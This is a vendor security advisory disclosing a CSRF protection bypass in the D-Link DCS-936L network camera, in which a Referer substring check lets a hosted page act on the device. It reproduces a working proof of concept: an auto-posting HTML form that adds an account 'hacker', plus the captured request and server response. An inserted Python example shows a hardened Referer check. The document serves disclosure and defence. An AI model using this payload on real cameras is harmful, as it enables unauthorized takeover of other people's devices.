Qualys Security Advisory QSA-2017-03-26 


March 26, 2017 


D-Link Network Camera DCS-936L Weak CSRF Protection Vulnerability 


SYNOPSIS: 
The D-Link DCS-936L camera implements CSRF protection that can be bypassed easily. 
Reference: http://us.dlink.com/product-category/home-solutions/view/network-cameras 


CVE: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7851 


VULNERABILITY DETAILS: 
Lab Setup: 


1. Target Camera: D-Link DCS-936L with latest firmware version 1.02.01 
2. Target IP Address: 192.168.100.6 
3. Site Hosting CSRF page: http://174.138.67.126 
4. CSRF URL: http://174.138.67.126/192.168.100.6.html 


Vulnerable/Tested Version: 
D-Link DCS-936L running firmware version 1.02.01 is affected. Other models may also be affected. 


Vulnerability: Cross-Site-Request-Forgery (CSRF) Bypass 


The D-Link DCS-936L prevents CSRF attacks by inspecting the ‘Referer’ header: the IP address in ‘Referer’ should 
match the one in the ‘Host’ header. If it does not, the device returns HTTP 403 in the response. 


However, the device does not perform a strict check on the ‘Referer’ header. It appears to look for the 
device’s IP address (the value of the ‘Host’ header) anywhere in the ‘Referer’ string and, if it is found, 
accepts the request. 


An unauthenticated, remote attacker could host a malicious site that makes requests to the victim’s device 
without having credentials. 
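The substring check described above next to a strict host comparison, as an added Python example that is not from the advisory or from D-Link's firmware. The weak check is a model of the behaviour the advisory describes, not the camera's actual code; the device address and the first two Referer values come from the lab setup, and the .example hostnames are constructed test vectors.

```python
from urllib.parse import urlsplit

# Device address as it appears in the Host header (from the advisory's lab setup).
DEVICE_HOST = "192.168.100.6"


def weak_referer_check(host: str, referer: str) -> bool:
    """Model of the check the advisory describes (assumption about the firmware):
    the request is accepted if the device address occurs anywhere in the Referer."""
    return host.split(":")[0] in referer


def strict_referer_check(host: str, referer: str) -> bool:
    """Hardened check: the Referer must be an http(s) URL whose host component is
    exactly the device's own host. A missing Referer is rejected, which is the safe
    default for state-changing endpoints such as tools_admin.cgi."""
    if not referer:
        return False
    try:
        ref = urlsplit(referer)
        own = urlsplit("//" + host)  # parse Host the same way so an explicit port is handled
    except ValueError:               # malformed URL, e.g. a bad IPv6 literal
        return False
    if ref.scheme not in ("http", "https") or ref.hostname is None:
        return False
    return ref.hostname == own.hostname


# Constructed sample Referers mapped to whether they are really same-origin.
# All four contain the device address, so the weak check accepts every one of them.
SAMPLE_REFERERS = {
    "http://192.168.100.6/eng/mainFrame.cgi?nav=Status": True,   # legitimate, same origin
    "http://174.138.67.126/192.168.100.6.html": False,           # the advisory's bypass
    "http://192.168.100.6.attacker.example/": False,             # address as a subdomain label
    "http://192.168.100.6@attacker.example/": False,             # address in the userinfo part
}


def compare_checks() -> dict:
    """Return {referer: (weak_result, strict_result)} for the sample values."""
    return {r: (weak_referer_check(DEVICE_HOST, r), strict_referer_check(DEVICE_HOST, r))
            for r in SAMPLE_REFERERS}


if __name__ == "__main__":
    for ref, (weak, strict) in compare_checks().items():
        print(f"{ref:55} weak={weak!s:5} strict={strict}")
```

Browsers may suppress the Referer entirely (referrer policies, privacy extensions), so in practice the strict comparison should be paired with an Origin header check or a per-session anti-CSRF token rather than used alone.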


Risk Factor: Low 


Impact: 


If a victim is logged into the camera’s web console and, from another tab in the same browser, visits a 
malicious site hosting <Target_Device_IP.HTML>, the malicious site can send requests to the victim’s device. 
An attacker can add a new user, replace the firmware with a malicious one, or connect the victim’s device 
to a rogue wireless network. 


Note: An attacker can easily find out the public IP address of a victim’s device on Shodan or similar search 
engines in order to create the <Target_Device_IP.HTML> file. 


CVSS Score: AV:N/AC:M/Au:N/C:C/I:C/A:C 


Proof-Of-Concept: 
1. The attacker hosts ‘192.168.100.6.html’ on 174.138.67.126. 
[Screenshot: editor writing the file "192.168.100.6.html" (20 lines, 503 bytes)] 


Note: This request can be sent over HTTPS. The only reason I am sending it over HTTP is to avoid the 
browser’s warning for the BurpSuite proxy. 


2. Victim logs into his device. 


[Screenshot: Device Info page at http://192.168.100.6/eng/mainFrame.cgi?nav=Status showing Camera Name DCS-936L, 
Firmware Version 1.02.01, Hardware Version A, Agent Version 2.1.0-b11, IPv4 Address 192.168.100.6] 

3. The victim then visits the attacker’s site http://174.138.67.126/192.168.100.6.html 




4. The above request adds a new user ‘hacker’, after which the camera’s web server restarts. 


[Screenshot: http://192.168.100.6/eng/admin/tools_admin.cgi after the request, showing "Changes saved." and 
"Camera Web Server is currently restarting, please wait 18 seconds."] 

5. Request in BurpSuite: 


Response from 174.138.67.126 serving 192.168.100.6.html, as captured in BurpSuite: 

Server: Apache/2.2.22 (Ubuntu) 
ETag: "20255-1f7-54b9ec40c5e90" 
Accept-Ranges: bytes 
Vary: Accept-Encoding 
Content-Length: 503 
Connection: close 
Content-Type: text/html 

<html> 
<body> 
<form id="CSRF" action="http://192.168.100.6/eng/admin/tools_admin.cgi" method="POST"> 
<input type="hidden" name="user" value="hacker"> 
<input type="hidden" name="action" value="set"> 
<input type="hidden" name="password" value="abc123"> 
<input type="hidden" name="confirmPassword" value="abc123"> 
</form> 
</body> 
</html> 


The browser sends the add-user request to the target device 192.168.100.6. The Referer header is set to 
http://174.138.67.126/192.168.100.6.html. As this contains the IP address of the device (192.168.100.6), 
the request is processed successfully. 
POST /eng/admin/tools_admin.cgi HTTP/1.1 
Host: 192.168.100.6 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://174.138.67.126/192.168.100.6.html 
Cookie: language=eng; usePath=null 
Authorization: Basic YWRtaW46YWJjMTIz 
Connection: close 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 61 

user=hacker&action=set&password=abc123&confirmPassword=abc123 


The server response shows that the user hacker was added successfully: 
<user> 
<name>admin</name> 
</user> 
</Administrators> 
<Users> 
<max>20</max> 
<size>1</size> 
<user> 
<name>hacker</name> 
</user> 
</Users> 
<eth0Ipv4Addr>192.168.100.6</eth0Ipv4Addr> 
</config> 
</root> 


[Screenshot: http://192.168.100.6/eng/admin/tools_admin.cgi after the request; the USER LIST section now 
shows the added account] 

8. The attacker can now log into the device as hacker/abc123. 


[Screenshot: live view page http://192.168.100.6/eng/liveView.cgi?nav=Live (Product: DCS-936L, Firmware 
Version: 1.02) loaded with the new credentials; the browser developer tools Network tab shows the GET request 
to liveView.cgi returning HTTP 200 OK] 